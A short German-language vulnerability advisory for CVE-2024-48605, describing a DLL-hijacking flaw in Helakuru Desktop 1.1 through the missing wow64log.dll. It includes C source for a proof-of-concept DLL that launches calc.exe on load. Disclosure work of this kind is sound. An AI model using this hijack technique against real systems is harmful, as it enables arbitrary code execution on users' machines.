
Helakuru Version 1.1 DLL-Hijack - CVE-2024-48605
Zusammenfassung
Die Helakuru Desktop-Version 1.1v läuft sowohl auf 64-Bit- als auch auf 32-Bit-Architekturen. Bei Tests wurde festgestellt, dass das Programm versucht, wow64log.dll zu laden, das standardmäßig in modernen Windows-Betriebssystemen nicht enthalten ist. Dies führt zu einem Fehler „Name nicht gefunden“ und macht das Programm anfällig für DLL-Hijacking. Durch die Erstellung einer schädlichen wow64log.dll kann beliebiger Code ausgeführt werden.
Betroffene Version
Helakuru Desktop 1.1v
Schritte zur Reproduktion

#include <windows.h>
#include <stdio.h>
void LaunchCalculator()
{
STARTUPINFOA si;
PROCESS_INFORMATION pi;
ZeroMemory(&si, sizeof(si));
si.cb = sizeof(si);
ZeroMemory(&pi, sizeof(pi));
const char* calcCmd = "C:\\Windows\\System32\\calc.exe";
if (!CreateProcessA(
NULL,
(LPSTR)calcCmd,
NULL,
NULL,
FALSE,
0,
NULL,
NULL,
&si,
&pi))
{
printf("CreateProcess failed (%d).\n", GetLastError());
}
else
{
WaitForSingleObject(pi.hProcess, INFINITE);
CloseHandle(pi.hProcess);
CloseHandle(pi.hThread);
}
}
BOOL APIENTRY DllMain(HMODULE hModule, DWORD ul_reason_for_call, LPVOID lpReserved)
{
switch (ul_reason_for_call)
{
case DLL_PROCESS_ATTACH:
LaunchCalculator();
break;
case DLL_THREAD_ATTACH:
case DLL_THREAD_DETACH:
case DLL_PROCESS_DETACH:
break;
}
return TRUE;
}


Auswirkung: Diese Sicherheitslücke ermöglicht die Ausführung beliebigen Codes.